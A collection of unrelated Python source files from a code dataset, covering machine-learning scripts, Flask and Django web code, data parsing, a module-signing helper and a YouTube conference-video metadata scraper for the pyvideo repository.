filedir = 'faceimg/{}/{}.jpeg'.format(person, count)
count += 1
def collect_dataset(output_face):
print('Collecting faces')
face_images = []
labels = []
labels_dic = {}
path = output_face
people = [person for person in os.listdir(path)]
for i, person in enumerate(tqdm(people)):
labels_dic[i] = person
imagedir = os.path.join(path, person)
for image in os.listdir(imagedir):
img = cv2.imread(os.path.join(imagedir, image), cv2.COLOR_BGR2RGB)
face_images.append(img)
labels.append(person)
return (face_images, np.array(labels), labels_dic)
def main(args):
#Comment this line if you've already got cutted face images.
gen_dataset(args.image_path)
face_images, labels, labels_dic = collect_dataset(args.output_face)
encoder = LabelEncoder()
encoder.fit(labels)
encoded_labels = encoder.transform(labels)
#encoded_labels = to_categorical(encoded_labels)
zipped_object = list(zip(face_images, encoded_labels))
random.shuffle(zipped_object)
X, y = zip(*zipped_object)
X = np.asarray(X)
y = np.asarray(y)
X.reshape(-1, IMG_SIZE, IMG_SIZE, 3)
pickle_data(os.path.join(args.output_data, 'X.pickle'), X)
pickle_data(os.path.join(args.output_data, 'y.pickle'), y)
pickle_data(os.path.join(args.output_data, 'dict.pickle'), labels_dic)
if __name__ == '__main__':
FLAGS, unparsed = parser.parse_known_args()
main(FLAGS) |
24,656 | 6582fdabcabd53d913ae70b4332429b97d5d75aa | import pandas as pd
import numpy as np
import xgboost as xgb
from sklearn.base import TransformerMixin
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_absolute_error
from sklearn.model_selection import train_test_split
class FeatureExtractor(TransformerMixin):
def fit(self, df_1, df_2):
df = pd.concat([df_1, df_2], axis=0)
self.cat_columns = [col for col in df.columns if col[:3] == 'cat']
self.le_dict = {}
for col in self.cat_columns:
self.le_dict[col] = LabelEncoder().fit(df[col])
return self
def transform(self, df):
df = df.copy()
df.drop(['id'], 1, inplace=True)
for col in self.cat_columns:
df[col] = self.le_dict[col].transform(df[col])
return df
def target_transform(y, mu=200):
return np.log(y + mu)
def target_inverse_transform(y_tr, mu=200):
return np.exp(y_tr) - mu
def get_submission(y_sub):
df_sub = df_test[['id']].copy()
df_sub['loss'] = y_sub
return df_sub
if __name__ == "__main__":
# Read and preprocess data
df = pd.read_csv('../raw_data/train.csv')
df_test = pd.read_csv('../raw_data/test.csv')
X = df.drop(['loss'], 1)
y = df.loss
X_test = df_test
fe = FeatureExtractor().fit(X, X_test)
X_tr = fe.transform(X)
X_test = fe.transform(df_test)
X_train, X_val, y_train, y_val = train_test_split(X_tr, y, test_size=0.2, random_state=2016)
dtrain = xgb.DMatrix(X_train, target_transform(y_train))
dtrain_full = xgb.DMatrix(X_tr, target_transform(y))
dval = xgb.DMatrix(X_val, target_transform(y_val))
dtest = xgb.DMatrix(X_test)
watchlist = [(dval, 'val')]
params = {
'alpha': 2.8057319601765127,
'colsample_bytree': 0.46,
'max_depth': 13,
'gamma': 0.9945292474298767,
'subsample': 0.9,
'eta': 0.001,
'seed': 2016,
'min_child_weight': 1,
'objective': 'reg:linear',
'eval_metric': 'mae',
'silent': 1,
'nthread': 4
}
num_boost_round = 100000
xgbm = xgb.train(
params, dtrain, num_boost_round,
evals=watchlist, early_stopping_rounds=50,
verbose_eval=False)
best_iter = xgbm.best_iteration
y_pred = target_inverse_transform(xgbm.predict(dval))
mae = mean_absolute_error(y_val, y_pred)
print 'MAE = {:.2f}'.format(mae)
num_boost_round = best_iter
xgbm = xgb.train(params, dtrain_full, num_boost_round)
y_pred = target_inverse_transform(xgbm.predict(dtest))
submission = get_submission(y_pred)
submission.to_csv('../submissions/11_25_1.csv', index=False)
|
24,657 | 30c38b24dcee1e2148ca1304057eef99a151a77d | from flask import Flask, request, render_template
from chatterbot import ChatBot
from chatterbot.trainers import ChatterBotCorpusTrainer
from chatterbot.trainers import ListTrainer
app = Flask(__name__)
bot = ChatBot(
'Hedwig',
storage_adapter='chatterbot.storage.SQLStorageAdapter',
logic_adapters=[
'chatterbot.logic.MathematicalEvaluation',
'chatterbot.logic.TimeLogicAdapter'
],
database_uri='sqlite:///database.sqlite3'
)
@app.route("/")
def introduce():
# from data.about import bot
return render_template("index.html", data = "Hi")
@app.route("/get")
def get_bot_response():
if request.method == "POST":
userText = request.args.get('chat-input')
result = bot.get_response(userText)
return render_template("base.html", data = result)
else :
return render_template("base.html") |
24,658 | 40aae620a6bef4d615b934818411fccfdb73391b | # -*- coding: utf-8 -*-
import os
import pandas as pd
def find_file(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if pattern in name:
result.append(os.path.join(root, name))
return result
def read_data(data):
doc_nm = pd.read_excel(data, skiprows=0, skip_footer=1000)
doc_com = pd.read_excel(data, skiprows=1, skip_footer=1000)
doc_y = pd.read_excel(data, skiprows=2, skip_footer=1000)
# test if file reads to DataFrame
assert isinstance(doc_nm, pd.DataFrame)
assert isinstance(doc_com, pd.DataFrame)
assert isinstance(doc_y, pd.DataFrame)
doc_name = "".join([i for i in doc_nm.keys()[0] if not i.isdigit()])
doc_comment = doc_com.keys()[0]
doc_years = [ii for ii in doc_y.keys() if 'год' in ii]
datafile = pd.read_excel(data, skiprows=3, skip_footer=7)
# Remove digits from the months names
new_names = []
for ii in datafile.keys():
name = ''
for jj in ii:
if jj.isalpha():
name = name + jj
new_names.append(name)
datafile.rename(columns=dict(zip(datafile.keys(), new_names)), inplace=True)
# Replace space on the end of the region name if exists
for nm in datafile['Unnamed']:
new = "".join([i for i in nm if not i.isdigit()])
datafile.replace(nm, new, inplace=True)
if nm[-1] == ' ':
nnm = nm[:-1]
datafile.replace(nm, nnm, inplace=True)
return doc_name, doc_comment, doc_years, datafile
# # read data
# doc_name, doc_comment, doc_years, datafile = read_data('230-232 ' + source_definitions[2]['filename'])
#
# # todo:
# # - summable regions
#
# # - regions by district
# districts = []
# districts_rows = []
# for row, nm in enumerate(datafile['Unnamed']):
# if 'федеральный округ' in nm:
# districts.append(nm)
# districts_rows.append(row)
#
# center_district = datafile.iloc[districts_rows[0]:districts_rows[1]].reset_index(drop=True)
# north_west_district = datafile.iloc[districts_rows[1]:districts_rows[2]].reset_index(drop=True)
# south_district = datafile.iloc[districts_rows[2]:districts_rows[3]].reset_index(drop=True)
# north_caucasus_district = datafile.iloc[districts_rows[3]:districts_rows[4]].reset_index(drop=True)
# volga_district = datafile.iloc[districts_rows[4]:districts_rows[5]].reset_index(drop=True)
# ural_district = datafile.iloc[districts_rows[5]:districts_rows[6]].reset_index(drop=True)
# siberia_district = datafile.iloc[districts_rows[6]:districts_rows[7]].reset_index(drop=True)
# far_eastern_district = datafile.iloc[districts_rows[7]:districts_rows[8]].reset_index(drop=True)
# crimea_district = datafile.iloc[districts_rows[8]:].reset_index(drop=True)
#
# # Test districts names
# assert testable_district_names[0] in center_district['Unnamed'][0]
# assert testable_district_names[1] in north_west_district['Unnamed'][0]
# assert testable_district_names[2] in south_district['Unnamed'][0]
# assert testable_district_names[3] in north_caucasus_district['Unnamed'][0]
# assert testable_district_names[4] in volga_district['Unnamed'][0]
# assert testable_district_names[5] in ural_district['Unnamed'][0]
# assert testable_district_names[6] in siberia_district['Unnamed'][0]
# assert testable_district_names[7] in far_eastern_district['Unnamed'][0]
# assert testable_district_names[8] in crimea_district['Unnamed'][0]
#
#
# # Test regions names
# for test_dist, dist in zip(testable_district_names, districts):
# assert test_dist in dist
#
# # Test if all regions are in datafile
# for test_nm, nm in zip(testable_region_names, datafile['Unnamed'].values):
# assert test_nm in nm
#
# # Test years
# for test_ye, ye in zip(years, doc_years):
# assert str(test_ye) in ye |
24,659 | 345c9564c22ffe50ae071a5e37897001b1523fbf | from sklearn.ensemble import RandomForestClassifier
from imutils import resize
import pandas as pd
import numpy as np
import time
import cv2
dataX = pd.read_csv('./dataset/train_x.csv')
y = pd.read_csv('./dataset/train_y.csv')
clf = RandomForestClassifier(n_jobs=2, random_state=0)
clf.fit(dataX, np.ravel(y))
candy = ['Jet_azul', 'Flow_negra', 'Flow_blanca', 'Jumbo_naranja', 'Jumbo_roja', 'Chocorramo', 'Fruna_verde', 'Fruna_naranja', 'Fruna_roja', 'Fruna_amarilla']
candy_dict = {'Jet_azul':0, 'Flow_negra':0, 'Flow_blanca':0, 'Jumbo_naranja':0, 'Jumbo_roja':0, 'Chocorramo':0, 'Fruna_verde':0, 'Fruna_naranja':0, 'Fruna_roja':0, 'Fruna_amarilla':0}
def getRGB(image):
kernelOP = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3,3))
kernelCL = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11,11))
img1 = cv2.imread("dataset/banda.jpeg")
img1 = cv2.morphologyEx(img1, cv2.MORPH_OPEN, kernelOP, iterations=2)
img2 = image
img2 = cv2.morphologyEx(img2, cv2.MORPH_CLOSE, kernelCL, iterations=2)
diff = cv2.absdiff(img2, img1)
mask = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
th = 35
imask = mask>th
canvas = np.zeros_like(img2, np.uint8)
canvas[imask] = img2[imask]
rprom = 0
gprom = 0
bprom = 0
cont = 0
a, b, c = canvas.shape
zero = np.array([0,0,0])
for i in range(a-1):
for j in range(b-1):
arr = canvas[i][j]
if ((arr > 150).all()):
bprom += arr[0]
gprom += arr[1]
rprom += arr[2]
cont += 1
return [int(rprom/cont),int(gprom/cont),int(bprom/cont)]
kernelOP = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
kernelCL = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))
cap = cv2.VideoCapture(1)
cap.set(3,640)
cap.set(4,480)
cap.set(cv2.CAP_PROP_AUTOFOCUS, 0)
cap.set(cv2.CAP_PROP_AUTO_EXPOSURE, 0.25)
cap.set(cv2.CAP_PROP_EXPOSURE , 0.5)
fgbg = cv2.bgsegm.createBackgroundSubtractorMOG()
found = False
label = ''
while(True):
ret, frame = cap.read()
frame = frame[::, 95:525]
image = frame
image = resize(image, width=500)
image = image[50:3500, 75:480]
image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
height, width = image.shape[:2]
thresh = fgbg.apply(image)
thresh = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernelOP, iterations=2)
thresh = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernelCL, iterations=2)
im, contours, hierarchy= cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
if len(contours) > 0 and cv2.contourArea(contours[0]) > 10000 and cv2.contourArea(contours[0]) < 80000 and found != True:
found = True
rect = cv2.minAreaRect(contours[0])
box = cv2.boxPoints(rect)
box = np.int0(box)
cv2.drawContours(image,[box],0,(0,0,255),2)
if rect[0][1] > 290 and rect[0][1] < 325:
area = rect[1][0] * rect[1][1]
rgb = getRGB(frame)
print('Area: ', area)
print('Color: ', rgb)
data = rgb + [area]
label = candy[int(clf.predict([data]))]
candy_dict[label] += 1
print(label)
else:
found = False
cv2.putText(image, label, (width-400,height-100) , cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))
cv2.imshow("objects Found", image)
time.sleep(0.01)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
print(candy_dict)
cap.release()
cv2.destroyAllWindows()
|
24,660 | 4ffc1ffa3ad25d8ee4aa7b73f8c8786d38ffa4cf | # -*- coding:utf-8 -*-
import pynlpir
pynlpir.open()
def get_keywords(text, max_words=10):
return pynlpir.get_key_words(text, max_words)
if __name__=='__main__':
keywords_count = {}
url_keywords = {}
for line in open('../data/xinjiang_profile_wx.dat'):
url, content = line.strip('\n').split('\t')
keys = get_keywords(content)
url_keywords[url] = keys
for k in keys:
keywords_count[k] = keywords_count.get(k, 0) + 1
keywords = [k for k, v in keywords_count.items() if v > 10]
|
24,661 | 0cb1f90a59d3e5fbebadb9e5e3cdedd13bc6262b | # Use pandas_datareader package to collect web data.
# Use matplotlib to draw a graph of the stock data
import pandas_datareader.data as web
import datetime
import matplotlib.pyplot as plt
start = datetime.datetime(2016, 2, 19) # Year, Month, Day
end = datetime.datetime(2016, 3, 4)
# gs = web.DataReader("078930.KS", "yahoo", start, end)
# gs = web.DataReader("078930", "naver", start, end) # The same as above.
# print(gs)
# print(gs.info()) # 10 data in total.
gs = web.DataReader("078930.KS", "yahoo") # Start = 2016/08/16 ~ today.
print(gs.info()) # 1223 data in total
# plt.plot(gs['Adj Close']) # This is without the date information on the X-axis
# plt.show()
plt.plot(gs.index, gs['Adj Close'])
plt.show()
|
24,662 | acf55ee4ca592d67bedcb874bdb6b55204287868 | from utils.visualization import Visualizer |
24,663 | e28fdcd6726c0834087e6d64277a8f94314ca1ed | from numpy import *
from pylab import *
N = 1000
xi = linspace(0,1,N)
t = linspace(0,1000,100*N)
p1,p2 = [1./6, 5./6]
'''
def V(x):
a = 0.3 # shift energy up a bit...
k = 10 #stiffness is good for a scale factor
mp = 0.5*(p1+p2)
V1 = lambda x: a+0.5*k*(x-p1)**2.
V2 = lambda x: a+0.5*k*(x-p2)**2.
Vx = (x-p2)*V1(x) + (p1-x)*V2(x)
return Vx
#if x <= mp: Vx = a+0.5*k*(x-p1)**2.
#elif x >= mp: Vx = a+0.5*k*(x-p2)**2.
#return Vx
'''
Vx = []
xf = []
V = lambda x: 0.5*(1+sin(3*pi*(x-1./3)))
for x in xi:
Vx.append( V(x))
mp = 0.5*(p1+p2)
if x <mp: xf.append(p1)
elif round(x,4) == 0.5045: xf.append(mp)
elif x > mp: xf.append(p2)
plot(xi, Vx,'b.',label=r'$V(x)$')
plot(xi,xf,'r.',label=r'$x_f(x_i)$')
xlabel(r'$x$')
legend(loc=2)
savefig('discontinuity.png')
show()
|
24,664 | 9631e512b5765a81d9f04e7d0e064c7e2a66fda6 | """ Securely wraps a module so it can be securely imported
"""
from crypto_utils import *
# TODO: to make this many functions or one with many options?
def secure_build(module_file, private_key_file='private_key.pem',
public_key_file='public_key.pem', mode='v',
sig_file_name='signature.pem'):
''
# read module file
print(f"Reading Module {module_file!r}...")
try:
code = open(module_file, "rb").read()
except FileNotFoundError:
raise FileNotFoundError(f"{module_file!r} Was Not Found")
# check if key exists, if not generate a key pair
private_key, public_key = load_keys(private_key_file, public_key_file)
if private_key is None or public_key is None:
print("Generating New Keys...")
private_key, public_key = gen_key_pair()
write_keys(private_key, private_key_file,
public_key, public_key_file)
print(f"Wrote Keys to {private_key_file!r} \
and {public_key_file!r}")
digest, sig = sign_data(private_key, code)
if digest is None or sig is None:
print("Unable To Sign Module")
return None
if 'v' in mode:
print("Verifying Signature...")
# quick verify test
if verify_sig(code, public_key, sig):
print("Successful Signature Verification")
else:
print("Could Not Verify Signature")
write_signature(sig, sig_file_name)
print(f"Wrote Signature To {sig_file_name!r}")
return sig
|
24,665 | c6bc1e6db4717315c38e6b698e9c666ef35f39ad | """p2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from a1 import views
from django.contrib.auth import views as auth_views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.IndexView.as_view(),name='home'),
path('signup',views.SignUpView.as_view(),name='signup'),
path('login',views.LoginFormView.as_view(),name='login'),
path('logout',views.LogoutFormView.as_view(),name='logout'),
path('a1/',include('a1.urls')),
path('reset_password/',auth_views.PasswordResetView.as_view(template_name="a1/password_reset.html"),name="reset_password"),
path('reset_password_sent/',auth_views.PasswordResetDoneView.as_view(template_name="a1/password_reset_done.html"),name="password_reset_done"),
path('reset/<uidb64>/<token>/',auth_views.PasswordResetConfirmView.as_view(template_name="a1/password_reset_confirm.html"),name="password_reset_confirm"),
path('reset_password_complete/',auth_views.PasswordResetCompleteView.as_view(template_name="a1/password_reset_complete.html"),name="password_reset_complete"),
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
24,666 | 0527e23762add4b4b81435535c67b32fd3a49370 | import math
x = int(input())
sqrt_x = int(math.sqrt(x))
for i in range(1, sqrt_x):
if(x % i == 0):
X = i
Z = x/i
Y = math.sqrt(1/3*(-7*X + math.sqrt(52*X*X*X*X+48*Z)))
a = round((X+Y)/2)
b = round((X-Y)/2)
if(a*a*a*a*a - b*b*b*b*b == x):
print(a, b)
exit()
|
24,667 | 535db5a2ad138b8eae4c4f03a63a8ccdc2122481 | #!/usr/bin/env python3
"""Scrape several conferences into pyvideo repository"""
import copy
import datetime
import json
import os
import pathlib
import re
import sys
import sh
import slugify
import yaml
import youtube_dl
from loguru import logger
JSON_FORMAT_KWARGS = {
'indent': 2,
'separators': (',', ': '),
'sort_keys': True,
}
def load_events(fich):
"""Loads events data yaml file"""
with fich.open() as fd_conf:
yaml_text = fd_conf.read()
conf = yaml.safe_load(yaml_text)
return yaml_text, conf
def save_file(path, text):
"""Create a file in `path` with content `text`"""
with path.open(mode='w') as f_stream:
f_stream.write(text)
def youtube_dl_version():
"""Returns the actual version of youtube-dl"""
import pkg_resources
return pkg_resources.get_distribution("youtube-dl").version
class Event:
"""PyVideo Event metadata"""
def __init__(self, event_data: dict, repository_path):
self.videos = []
self.youtube_videos = []
self.file_videos = []
self.repository_path = repository_path
self.branch = event_data['dir']
self.event_dir = self.repository_path / event_data['dir']
self.video_dir = self.event_dir / 'videos'
self.title = event_data['title']
for mandatory_field in ['title', 'dir', 'issue', 'youtube_list']:
if mandatory_field in event_data and event_data[mandatory_field]:
pass
else:
logger.error('No {} data in conference {}', mandatory_field,
self.title)
raise ValueError("{} can't be null".format(mandatory_field))
self.issue = event_data['issue']
if isinstance(event_data['youtube_list'], str):
self.youtube_lists = [event_data['youtube_list']]
elif isinstance(event_data['youtube_list'], list):
self.youtube_lists = event_data['youtube_list']
else:
raise TypeError(
"youtube_list must be a string or a list of strings")
self.related_urls = event_data.get('related_urls', [])
self.language = event_data.get('language', None)
self.tags = event_data.get('tags', [])
if not self.tags:
self.tags = []
if 'dates' in event_data and event_data['dates']:
self.know_date = True
self.date_begin = event_data['dates']['begin']
self.date_end = event_data['dates'].get('end', self.date_begin)
self.date_default = event_data['dates'].get(
'default', self.date_begin)
else:
self.know_date = False
self.minimal_download = event_data.get('minimal_download', False)
if self.minimal_download:
self.branch = "{}--minimal-download".format(self.branch)
self.overwrite, self.add_new_files, self.wipe = False, False, False
self.overwrite_fields = []
if 'overwrite' in event_data and event_data['overwrite']:
overwrite = event_data['overwrite']
self.overwrite = True
if 'all' in overwrite and overwrite['all']:
self.wipe = True
else:
if 'add_new_files' in overwrite and overwrite['add_new_files']:
self.add_new_files = True
if ('existing_files_fields' in overwrite
and overwrite['existing_files_fields']):
self.overwrite_fields = overwrite['existing_files_fields']
def create_branch(self):
"""Create a new branch in pyvideo repository to add a new event"""
os.chdir(str(self.repository_path))
sh.git.checkout('master')
sh.git.checkout('-b', self.branch)
logger.debug('Branch {} created', self.branch)
def create_dirs(self):
"""Create new directories and conference file in pyvideo repository to
add a new event"""
for new_directory in [self.event_dir, self.event_dir / 'videos']:
new_directory.mkdir(exist_ok=self.overwrite)
logger.debug('Dir {} created', new_directory)
def create_category(self): # , conf_dir, title):
"""Create category.json for the conference"""
category_file_path = self.event_dir / 'category.json'
category_data = {
'title': self.title,
}
category_data_text = json.dumps(category_data, **
JSON_FORMAT_KWARGS) + '\n'
save_file(category_file_path, category_data_text)
logger.debug('File {} created', category_file_path)
def download_video_data(self):
"""Download youtube metadata corresponding to this event youtube
lists"""
def scrape_url(url):
"""Scrape the video list, youtube_dl does all the heavy lifting"""
ydl_opts = {
"ignoreerrors": True, # Skip private and unavaliable videos
}
ydl = youtube_dl.YoutubeDL(ydl_opts)
with ydl:
result_ydl = ydl.extract_info(
url,
download=False # No download needed, only the info
)
logger.debug('Url scraped {}', url)
if 'entries' in result_ydl:
# It's a playlist or a list of videos
return result_ydl['entries']
# Just a video
return [result_ydl]
youtube_list = sum((scrape_url(url) for url in self.youtube_lists), [])
for youtube_video_data in youtube_list:
if youtube_video_data: # Valid video
self.youtube_videos.append(
Video.from_youtube(
video_data=youtube_video_data, event=self))
else:
logger.warning('Null youtube video')
def load_video_data(self):
"""Load video data form existing event video files"""
self.file_videos = [
Video.from_file(path, self)
for path in self.video_dir.glob('*.json')
]
def merge_video_data(self):
"""Merge old video data when configured so"""
if self.overwrite:
if self.wipe:
self.videos = self.youtube_videos
elif self.add_new_files or self.overwrite_fields:
old_videos = {
video.filename: video
for video in self.file_videos
}
old_videos_url = {
video.metadata['videos'][0]['url']: video
for video in self.file_videos
}
new_videos = {}
for video in self.youtube_videos:
new_video_url = video.metadata['videos'][0]['url']
if new_video_url in old_videos_url:
new_video_filename = old_videos_url[new_video_url].filename
else:
new_video_filename = video.filename
new_videos[new_video_filename] = video
if self.overwrite_fields:
forgotten = set(old_videos) - set(new_videos)
for name in forgotten:
logger.warning('Missing video: {} {}',
old_videos[name].filename,
old_videos[name].metadata['videos'][0]['url'],
)
changes = set(new_videos).intersection(set(old_videos))
for path in changes:
merged_video = old_videos[path].merge(
new_videos[path], self.overwrite_fields)
self.videos.append(merged_video)
else:
self.videos = self.file_videos
if self.add_new_files:
adds = set(new_videos) - set(old_videos)
self.videos.extend([new_videos[path] for path in adds])
else: # not self.overwrite
self.videos = self.youtube_videos
def save_video_data(self):
"""Save all event videos in PyVideo format"""
if self.overwrite:
# Erase old event videos
for path in self.video_dir.glob('*.json'):
path.unlink()
for video in self.videos:
video.save()
def create_commit(self, event_data_yaml):
"""Create a new commit in pyvideo repository with the new event data"""
os.chdir(str(self.repository_path))
sh.git.checkout(self.branch)
sh.git.add(self.event_dir)
message_body = (
'\n\nEvent config:\n~~~yaml\n{}\n~~~\n'.format(event_data_yaml)
+ '\nScraped with [pyvideo_scrape]'
+ '(https://github.com/pyvideo/pyvideo_scrape)')
if self.minimal_download:
message = ('Minimal download: '
+ '{}\n\nMinimal download executed for #{}'.format(
self.title, self.issue)
+ '\n\nOnly data that needs [no review](https://'
+ 'github.com/pyvideo/pyvideo_scrape#use-cases) was scraped.'
+ '\nThis event needs further scraping and human '
+ 'reviewing for the description and other data to show.'
+ message_body)
sh.git.commit('-m', message)
sh.git.push('--set-upstream', 'origin', self.branch)
# ~ sh.git.push('--set-upstream', '--force', 'origin', self.branch)
sh.git.checkout('master')
else:
message = (
'Scraped {}\n\nFixes #{}'.format(self.branch, self.issue)
+ message_body)
sh.git.commit('-m', message)
sh.git.checkout('master')
logger.debug('Conference {} commited', self.branch)
class Video:
"""PyVideo Video metadata"""
@staticmethod
def __calculate_title(video_data):
"""Calculate title from youtube fields"""
title = 'Unknown'
if 'fulltitle' in video_data.keys():
title = video_data['fulltitle']
elif 'title' in video_data.keys():
title = video_data['title']
elif '_filename' in video_data.keys():
title = video_data['_filename']
return title
def __calculate_slug(self):
"""Calculate slug from title"""
return slugify.slugify(self.metadata['title'])
def __calculate_date_recorded(self, upload_date_str):
"""Calculate record date from youtube field and event dates"""
upload_date = datetime.date(
int(upload_date_str[0:4]),
int(upload_date_str[4:6]), int(upload_date_str[6:8]))
if self.event.know_date:
if not (self.event.date_begin <= upload_date <=
self.event.date_end):
return self.event.date_default.isoformat()
return upload_date.isoformat()
def __init__(self, event):
self.event = event
self.filename = None
self.metadata = {}
@classmethod
def from_file(cls, path, event):
"""Contructor. Retrieves video metadata from file"""
self = cls(event)
self.filename = path.stem # Name without .json
try:
with path.open() as f_path:
self.metadata = json.load(f_path)
except ValueError:
print('Json syntax error in file {}'.format(path))
raise
return self
@classmethod
def from_youtube(cls, video_data, event):
"""Contructor. Retrieves video metadata with youtube-dl"""
self = cls(event)
metadata = self.metadata
metadata['title'] = self.__calculate_title(video_data)
self.filename = self.__calculate_slug()
metadata['speakers'] = ['TODO'] # Needs human intervention later
# youtube_id = video_data['display_id']
# metadata['thumbnail_url'] =
# 'https://i.ytimg.com/vi/{}/maxresdefault.jpg'.format(youtube_id)
metadata['thumbnail_url'] = video_data['thumbnail']
metadata['videos'] = [{
'type': 'youtube',
'url': video_data['webpage_url']
}]
metadata['recorded'] = self.__calculate_date_recorded(
video_data['upload_date'])
# optional values
metadata['copyright_text'] = video_data['license']
metadata['duration'] = video_data['duration'] # In seconds
metadata['language'] = video_data['formats'][0].get(
'language', event.language)
if not metadata['language']:
metadata['language'] = event.language
metadata['related_urls'] = copy.deepcopy(event.related_urls)
if event.minimal_download:
metadata['speakers'] = []
metadata['tags'] = event.tags
metadata['description'] = ''
else:
metadata['tags'] = sorted(
set(video_data['tags']).union(set(event.tags)))
metadata['description'] = video_data['description']
description_urls = list(
set(
re.findall(r'http[s]?://[^ \\\n\t()[\]"`´\']+', video_data[
'description'])))
for url in description_urls:
metadata['related_urls'].append({'label': url, 'url': url})
return self
def merge(self, new_video, fields):
"""Create video copy overwriting fields """
merged_video = Video(self.event)
merged_video.filename = self.filename
for field in self.metadata:
if field in set(fields):
merged_video.metadata[field] = new_video.metadata.get(field)
else:
merged_video.metadata[field] = self.metadata.get(field)
return merged_video
def save(self):
""""Save to disk"""
path = self.event.video_dir / '{}.json'.format(self.filename)
if path.exists():
duplicate_num = 1
new_path = path
while new_path.exists():
duplicate_num += 1
new_path = path.parent / (
path.stem + '-{}{}'.format(duplicate_num, path.suffix))
logger.debug('Duplicate, renaming to {}', path)
path = new_path
data_text = json.dumps(self.metadata, **JSON_FORMAT_KWARGS) + '\n'
save_file(path, data_text)
logger.debug('File {} created', path)
@logger.catch
def main():
"""Scrape several conferences into pyvideo repository"""
logger.add(
sys.stderr,
format="{time} {level} {message}",
filter="my_module",
level="DEBUG")
time_init = datetime.datetime.now()
logger.debug('Time init: {}', time_init)
logger.debug('youtube-dl version: {} ', youtube_dl_version())
cwd = pathlib.Path.cwd()
events_file = cwd / 'events.yml'
event_data_yaml, events_data = load_events(events_file)
pyvideo_repo = pathlib.PosixPath(
events_data['repo_dir']).expanduser().resolve()
events = [
Event(event_data, repository_path=pyvideo_repo)
for event_data in events_data['events']
]
for event in events:
try:
event.create_branch()
event.create_dirs()
event.create_category()
except (sh.ErrorReturnCode_128, FileExistsError) as exc:
logger.warning('Event {} skipped', event.branch)
logger.debug(exc.args[0])
continue
event.download_video_data()
event.load_video_data()
event.merge_video_data()
event.save_video_data()
event.create_commit(event_data_yaml)
time_end = datetime.datetime.now()
time_delta = str(time_end - time_init)
logger.debug('Time init: {}', time_init)
logger.debug('Time end: {}', time_end)
logger.debug('Time delta: {}', time_delta)
if __name__ == '__main__':
main()
|
24,668 | f7922543bca34c7a6c175781d749a7d498915f86 | """CRUD actions.
"""
import psycopg2
import app.util as util
class Action(object):
def __init__(self, db_conn_params, model_inits):
self.db_conn_params = db_conn_params
self.model_inits = model_inits
class CreateAction(Action):
def execute(self, artifacts):
batch_models = list()
for artifact in artifacts:
models_row = {
'address': self.model_inits['address'](*[
artifact['address']['state'],
artifact['address']['city'],
artifact['address']['neighborhood'],
artifact['address']['place_name'],
artifact['address']['place_number'],
artifact['address']['place_complement'],
artifact['address']['cep'],
artifact['address']['latitude'],
artifact['address']['longitude']
]),
'candidate': self.model_inits['candidate'](*[
artifact['name'],
artifact['image_name'],
artifact['birthdate'],
artifact['gender'],
artifact['email'],
artifact['phone'],
artifact['tags']
])
}
models_row['experiences'] = list()
for _type in ['professional', 'educational']:
key = '%s_experiences' % _type
if key in artifact and artifact[key]:
experiences = artifact[key]
for experience in experiences:
models_row['experiences'].append(self.model_inits['experience'](*[
_type,
experience['institution_name'],
experience['title'],
experience['start_date'],
experience['end_date'],
experience['description']
]))
batch_models.append(models_row)
try:
db_conn = psycopg2.connect(**self.db_conn_params)
db_cur = db_conn.cursor()
for models_row in batch_models:
address_id = models_row['address'].save(db_cur)
candidate_id = models_row['candidate'].save(db_cur, address_id)
for model in models_row['experiences']:
model.save(db_cur, candidate_id)
db_conn.commit()
except util.DatabaseConstraintViolationError as err:
if err.constraint == util.DatabaseConstraintViolationError.UNIQUE:
reason = "%s '%s' already exists" % (err.field_name, err.field_value)
raise util.ActionError('create', err.resource, reason)
if err.constraint == util.DatabaseConstraintViolationError.NOT_NULL:
reason = 'Null value for non-nullable field'
raise util.ActionError('create', err.resource, reason)
raise err
except util.DatabaseInvalidValueError as err:
reason = 'Value invalid or too long for field'
if err.field_name:
reason = "%s '%s'" % (reason, err.field_name)
raise util.ActionError('create', err.resource, reason)
finally:
db_conn.close()
class ReadAction(Action):
def execute(self, params):
return {
'message': "Sorry, I'm very tired. Gonna sleep."
}
|
24,669 | 1debb227240c7f8bee3127033e8dc4a5d7ff9597 | /home/harshita/anaconda3/lib/python3.5/posixpath.py |
24,670 | b7b1c48afd6968bf4a7685331cf9ba515f5a7686 | # Generated by Django 2.2.11 on 2020-05-25 16:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_auto_20200523_2248'),
]
operations = [
migrations.CreateModel(
name='Logins',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_email', models.EmailField(max_length=60, unique=True, verbose_name='user email')),
('login_month', models.IntegerField()),
('login_year', models.IntegerField()),
],
options={
'verbose_name_plural': 'User logins',
'db_table': 'user logins',
},
),
]
|
24,671 | 13816be5ee9a1074112ef6013856b4eda7f041a4 | #!/usr/bin/env python3
from fastapi import Path, Body
from pydantic import BaseModel, Schema
from typing import List
class Job(BaseModel):
""" Defines the type parameter of POST /jobs request.
"""
id_video: str = Schema (None,
title = "Resource Path of the Video",
max_length = 256)
""" resource Path of the Video
"""
